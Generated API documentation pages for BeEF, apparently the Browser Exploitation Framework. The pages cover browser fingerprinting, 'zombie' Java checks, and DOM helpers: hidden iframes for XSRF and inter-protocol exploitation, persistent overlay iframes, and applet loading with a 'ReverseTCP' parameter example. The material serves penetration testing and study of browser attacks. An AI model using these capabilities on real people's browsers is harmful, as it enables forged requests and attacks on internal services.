<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line102">line 102</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isIE10"><span class="type-signature">(static) </span>isIE10<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if IE10.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line111">line 111</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isIE11"><span class="type-signature">(static) </span>isIE11<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if IE11.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line120">line 120</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isMidori"><span class="type-signature">(static) </span>isMidori<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Midori.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line54">line 54</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isO"><span class="type-signature">(static) </span>isO<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Opera.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2485">line 2485</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isO9_52"><span class="type-signature">(static) </span>isO9_52<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Opera 9.50 through 9.52.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2445">line 2445</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isO9_60"><span class="type-signature">(static) </span>isO9_60<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Opera 9.60 through 9.64.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2453">line 2453</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isO10"><span class="type-signature">(static) </span>isO10<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Opera 10.xx.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2461">line 2461</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isO11"><span class="type-signature">(static) </span>isO11<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Opera 11.xx.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2469">line 2469</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isO12"><span class="type-signature">(static) </span>isO12<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Opera 12.xx.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2477">line 2477</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isOdyssey"><span class="type-signature">(static) </span>isOdyssey<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Odyssey</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line62">line 62</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isS"><span class="type-signature">(static) </span>isS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Safari.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line993">line 993</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isS4"><span class="type-signature">(static) </span>isS4<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Safari 4.xx</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line953">line 953</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isS5"><span class="type-signature">(static) </span>isS5<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Safari 5.xx</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line961">line 961</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isS6"><span class="type-signature">(static) </span>isS6<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Safari 6.xx</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line969">line 969</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isS7"><span class="type-signature">(static) </span>isS7<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Safari 7.xx</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line977">line 977</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isS8"><span class="type-signature">(static) </span>isS8<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Safari 8.xx</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line985">line 985</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isWebKitBased"><span class="type-signature">(static) </span>isWebKitBased<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Webkit based</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1002">line 1002</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".javaEnabled"><span class="type-signature">(static) </span>javaEnabled<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Checks if the zombie has Java enabled.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line3848">line 3848</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".type"><span class="type-signature">(static) </span>type<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns the type of browser being used.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2495">line 2495</a>
</li></ul></dd>
</dl>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html> |
HTML | beef/docs/beef.browser.popup.html | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Namespace: popup</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Namespace: popup</h1>
<section>
<header>
<h2>
<span class="ancestors"><a href="beef.browser.html">.browser</a>.</span>popup</h2>
</header>
<article>
<div class="container-overview">
<div class="description"><p>Provides fuctions for working with cookies.
Several functions adopted from http://davidwalsh.name/popup-block-javascript
Original author unknown.</p></div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser_popup.js.html">browser/popup.js</a>, <a href="browser_popup.js.html#line7">line 7</a>
</li></ul></dd>
</dl>
</div>
<h3 class="subsection-title">Methods</h3>
<h4 class="name" id=".blocker_enabled"><span class="type-signature">(static) </span>blocker_enabled<span class="signature">()</span><span class="type-signature"></span></h4>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser_popup.js.html">browser/popup.js</a>, <a href="browser_popup.js.html#line15">line 15</a>
</li></ul></dd>
</dl>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html> |
HTML | beef/docs/beef.dom.html | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Namespace: dom</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Namespace: dom</h1>
<section>
<header>
<h2>dom</h2>
</header>
<article>
<div class="container-overview">
<div class="description"><p>Provides functionality to manipulate the DOM.</p></div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="dom.js.html">dom.js</a>, <a href="dom.js.html#line7">line 7</a>
</li></ul></dd>
</dl>
</div>
<h3 class="subsection-title">Methods</h3>
<h4 class="name" id=".attachApplet"><span class="type-signature">(static) </span>attachApplet<span class="signature">(id:, code:, codebase:, archive:, params:)</span><span class="type-signature"></span></h4>
<div class="description">
<p>Attach an applet to the DOM, using the best approach for differet browsers (object/applet/embed).
example usage in the code, using a JAR archive (recommended and faster):
beef.dom.attachApplet('appletId', 'appletName', 'SuperMario3D.class', null, 'http://127.0.0.1:3000/ui/media/images/target.jar', [{'param1':'1', 'param2':'2'}]);
example usage in the code, using codebase:
beef.dom.attachApplet('appletId', 'appletName', 'SuperMario3D', 'http://127.0.0.1:3000/', null, null);</p>
</div>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>id:</code></td>
<td class="type">
<span class="param-type">String</span>
</td>
<td class="description last"><p>reference identifier to the applet.</p></td>
</tr>
<tr>
<td class="name"><code>code:</code></td>
<td class="type">
<span class="param-type">String</span>
</td>
<td class="description last"><p>name of the class to be loaded. For example, beef.class.</p></td>
</tr>
<tr>
<td class="name"><code>codebase:</code></td>
<td class="type">
<span class="param-type">String</span>
</td>
<td class="description last"><p>the URL of the codebase (usually used when loading a single class for an unsigned applet).</p></td>
</tr>
<tr>
<td class="name"><code>archive:</code></td>
<td class="type">
<span class="param-type">String</span>
</td>
<td class="description last"><p>the jar that contains the code.</p></td>
</tr>
<tr>
<td class="name"><code>params:</code></td>
<td class="type">
<span class="param-type">String</span>
</td>
<td class="description last"><p>an array of additional params that the applet except.</p></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="dom.js.html">dom.js</a>, <a href="dom.js.html#line372">line 372</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".createElement"><span class="type-signature">(static) </span>createElement<span class="signature">(type, attributes)</span><span class="type-signature"> → {Array}</span></h4>
<div class="description">
<p>Creates a new element but does not append it to the DOM.</p>
</div>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>type</code></td>
<td class="type">
<span class="param-type">String</span>
</td>
<td class="description last"><p>the name of the element.</p></td>
</tr>
<tr>
<td class="name"><code>attributes</code></td>
<td class="type">
<span class="param-type">Array</span>
</td>
<td class="description last"><p>the attributes of that element.</p></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="dom.js.html">dom.js</a>, <a href="dom.js.html#line28">line 28</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<div class="param-desc">
<p>the created element.</p>
</div>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">Array</span>
</dd>
</dl>
<h4 class="name" id=".createForm"><span class="type-signature">(static) </span>createForm<span class="signature">(params:, append:)</span><span class="type-signature"> → {Object}</span></h4>
<div class="description">
<p>Create a form element with the specified parameters, appending it to the DOM if append == true</p>
</div>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>params:</code></td>
<td class="type">
<span class="param-type">Hash</span>
</td>
<td class="description last"><p>params to be applied to the form element</p></td>
</tr>
<tr>
<td class="name"><code>append:</code></td>
<td class="type">
<span class="param-type">Boolean</span>
</td>
<td class="description last"><p>automatically append the form to the body</p></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="dom.js.html">dom.js</a>, <a href="dom.js.html#line225">line 225</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<div class="param-desc">
<p>a form object</p>
</div>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">Object</span>
</dd>
</dl>
<h4 class="name" id=".createIframe"><span class="type-signature">(static) </span>createIframe<span class="signature">(type:, params:, styles:, a)</span><span class="type-signature"> → {Object}</span></h4>
<div class="description">
<p>Create an iFrame element and prepend to document body. URI passed via 'src' property of function's 'params' parameter
is assigned to created iframe tag's src attribute resulting in GET request to that URI.
example usage in the code: beef.dom.createIframe('fullscreen', {'src':$j(this).attr('href')}, {}, null);</p>
</div>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>type:</code></td>
<td class="type">
<span class="param-type">String</span>
</td>
<td class="description last"><p>can be 'hidden' or 'fullScreen'. defaults to normal</p></td>
</tr>
<tr>
<td class="name"><code>params:</code></td>
<td class="type">
<span class="param-type">Hash</span>
</td>
<td class="description last"><p>list of params that will be sent in request.</p></td>
</tr>
<tr>
<td class="name"><code>styles:</code></td>
<td class="type">
<span class="param-type">Hash</span>
</td>
<td class="description last"><p>css styling attributes, these are merged with the defaults specified in the type parameter</p></td>
</tr>
<tr>
<td class="name"><code>a</code></td>
<td class="type">
<span class="param-type">function</span>
</td>
<td class="description last"><p>callback function to fire once the iFrame has loaded</p></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="dom.js.html">dom.js</a>, <a href="dom.js.html#line114">line 114</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<div class="param-desc">
<p>the inserted iFrame</p>
</div>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">Object</span>
</dd>
</dl>
<h4 class="name" id=".createIframeIpecForm"><span class="type-signature">(static) </span>createIframeIpecForm<span class="signature">(rhost:, rport:, commands:)</span><span class="type-signature"></span></h4>
<div class="description">
<p>Create an invisible iFrame with a form inside, and POST the form in plain-text. Used for inter-protocol exploitation.</p>
</div>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>rhost:</code></td>
<td class="type">
<span class="param-type">String</span>
</td>
<td class="description last"><p>remote host ip/domain</p></td>
</tr>
<tr>
<td class="name"><code>rport:</code></td>
<td class="type">
<span class="param-type">String</span>
</td>
<td class="description last"><p>remote port</p></td>
</tr>
<tr>
<td class="name"><code>commands:</code></td>
<td class="type">
<span class="param-type">String</span>
</td>
<td class="description last"><p>protocol commands to be executed by the remote host:port service</p></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="dom.js.html">dom.js</a>, <a href="dom.js.html#line483">line 483</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".createIframeXsrfForm"><span class="type-signature">(static) </span>createIframeXsrfForm<span class="signature">(action:, method:, enctype:, inputs:)</span><span class="type-signature"></span></h4>
<div class="description">
<p>Create an invisible iFrame with a form inside, and submit it. Useful for XSRF attacks delivered via POST requests.</p>
</div>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>action:</code></td>
<td class="type">
<span class="param-type">String</span>
</td>
<td class="description last"><p>the form action attribute, where the request will be sent.</p></td>
</tr>
<tr>
<td class="name"><code>method:</code></td>
<td class="type">
<span class="param-type">String</span>
</td>
<td class="description last"><p>HTTP method, usually POST.</p></td>
</tr>
<tr>
<td class="name"><code>enctype:</code></td>
<td class="type">
<span class="param-type">String</span>
</td>
<td class="description last"><p>form encoding type</p></td>
</tr>
<tr>
<td class="name"><code>inputs:</code></td>
<td class="type">
<span class="param-type">Array</span>
</td>
<td class="description last"><p>an array of inputs to be added to the form (type, name, value).
example: [{'type':'hidden', 'name':'1', 'value':''} , {'type':'hidden', 'name':'2', 'value':'3'}]</p></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="dom.js.html">dom.js</a>, <a href="dom.js.html#line448">line 448</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".createInvisibleIframe"><span class="type-signature">(static) </span>createInvisibleIframe<span class="signature">()</span><span class="type-signature"> → {array}</span></h4>
<div class="description">
<p>Creates an invisible iframe on the hook browser's page.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="dom.js.html">dom.js</a>, <a href="dom.js.html#line67">line 67</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<div class="param-desc">
<p>the iframe.</p>
</div>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">array</span>
</dd>
</dl>
<h4 class="name" id=".detachApplet"><span class="type-signature">(static) </span>detachApplet<span class="signature">(id:)</span><span class="type-signature"></span></h4>
<div class="description">
<p>Given an id, remove the applet from the DOM.</p>
</div>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>id:</code></td>
<td class="type">
<span class="param-type">String</span>
</td>
<td class="description last"><p>reference identifier to the applet.</p></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="dom.js.html">dom.js</a>, <a href="dom.js.html#line436">line 436</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".generateID"><span class="type-signature">(static) </span>generateID<span class="signature">(prefix)</span><span class="type-signature"> → {String}</span></h4>
<div class="description">
<p>Generates a random ID for HTML elements</p>
</div>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>prefix</code></td>
<td class="type">
<span class="param-type">String</span>
</td>
<td class="description last"><p>a custom prefix before the random id. defaults to "beef-"</p></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="dom.js.html">dom.js</a>, <a href="dom.js.html#line18">line 18</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<div class="param-desc">
<p>generated id</p>
</div>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">String</span>
</dd>
</dl>
<h4 class="name" id=".getHighestZindex"><span class="type-signature">(static) </span>getHighestZindex<span class="signature">(whether)</span><span class="type-signature"> → {Integer|Hash}</span></h4>
<div class="description">
<p>Returns the highest current z-index</p>
</div>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>whether</code></td>
<td class="type">
<span class="param-type">Boolean</span>
</td>
<td class="description last"><p>to return an associative array with the height AND the ID of the element</p></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="dom.js.html">dom.js</a>, <a href="dom.js.html#line86">line 86</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<ul>
<li>
<div class="param-desc">
<p>Highest z-index in the DOM
OR</p>
</div>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">Integer</span>
</dd>
</dl>
</li>
<li>
<div class="param-desc">
<p>A hash with the height and the ID of the highest element in the DOM {'height': INT, 'elem': STRING}</p>
</div>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">Hash</span>
</dd>
</dl>
</li>
</ul>
<h4 class="name" id=".getLinks"><span class="type-signature">(static) </span>getLinks<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Get links of the current page.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="dom.js.html">dom.js</a>, <a href="dom.js.html#line251">line 251</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<div class="param-desc">
<p>array of URLs.</p>
</div>
<h4 class="name" id=".getLocation"><span class="type-signature">(static) </span>getLocation<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Get the location of the current page.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="dom.js.html">dom.js</a>, <a href="dom.js.html#line243">line 243</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<div class="param-desc">
<p>the location.</p>
</div>
<h4 class="name" id=".grayOut"><span class="type-signature">(static) </span>grayOut<span class="signature">(vis:, options:)</span><span class="type-signature"></span></h4>
<div class="description">
<p>Load a full screen div that is black, or, transparent</p>
</div>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>vis:</code></td>
<td class="type">
<span class="param-type">Boolean</span>
</td>
<td class="description last"><p>whether or not you want the screen dimmer enabled or not</p></td>
</tr>
<tr>
<td class="name"><code>options:</code></td>
<td class="type">
<span class="param-type">Hash</span>
</td>
<td class="description last"><p>a collection of options to customise how the div is configured, as follows:
opacity:0-100 // Lower number = less grayout higher = more of a blackout
// By default this is 70
zindex: # // HTML elements with a higher zindex appear on top of the gray out
// By default this will use beef.dom.getHighestZindex to always go to the top
bgcolor: (#xxxxxx) // Standard RGB Hex color code
// By default this is #000000</p></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="dom.js.html">dom.js</a>, <a href="dom.js.html#line161">line 161</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isDOMElement"><span class="type-signature">(static) </span>isDOMElement<span class="signature">(the)</span><span class="type-signature"> → {boolean}</span></h4>
<div class="description">
<p>Tests if the object is a DOM element.</p>
</div>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>the</code></td>
<td class="type">
<span class="param-type">Object</span>
</td>
<td class="description last"><p>DOM element.</p></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="dom.js.html">dom.js</a>, <a href="dom.js.html#line59">line 59</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<div class="param-desc">
<p>true if the object is a DOM element.</p>
</div>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">boolean</span>
</dd>
</dl>
<h4 class="name" id=".parseAppletParams"><span class="type-signature">(static) </span>parseAppletParams<span class="signature">(an)</span><span class="type-signature"> → {String}</span></h4>
<div class="description">
<p>Given an array of objects (key/value), return a string of param tags ready to append in applet/object/embed</p>
</div>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>an</code></td>
<td class="type">
<span class="param-type">Array</span>
</td>
<td class="description last"><p>array of params for the applet, ex.: [{'argc':'5', 'arg0':'ReverseTCP'}]</p></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="dom.js.html">dom.js</a>, <a href="dom.js.html#line349">line 349</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<div class="param-desc">
<p>the parameters as a string ready to append to applet/embed/object tags (ex.: <param name='abc' value='test' />).</p>
</div>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">String</span>
</dd>
</dl>
<h4 class="name" id=".persistentIframe"><span class="type-signature">(static) </span>persistentIframe<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Load the link (href value) in an overlay foreground iFrame.
The BeEF hook continues to run in background.
NOTE: if the target link is returning X-Frame-Options deny/same-origin or uses
Framebusting techniques, this will not work.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="dom.js.html">dom.js</a>, <a href="dom.js.html#line137">line 137</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".removeElement"><span class="type-signature">(static) </span>removeElement<span class="signature">(el)</span><span class="type-signature"></span></h4>
<div class="description">
<p>Removes element from the DOM.</p>
</div>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
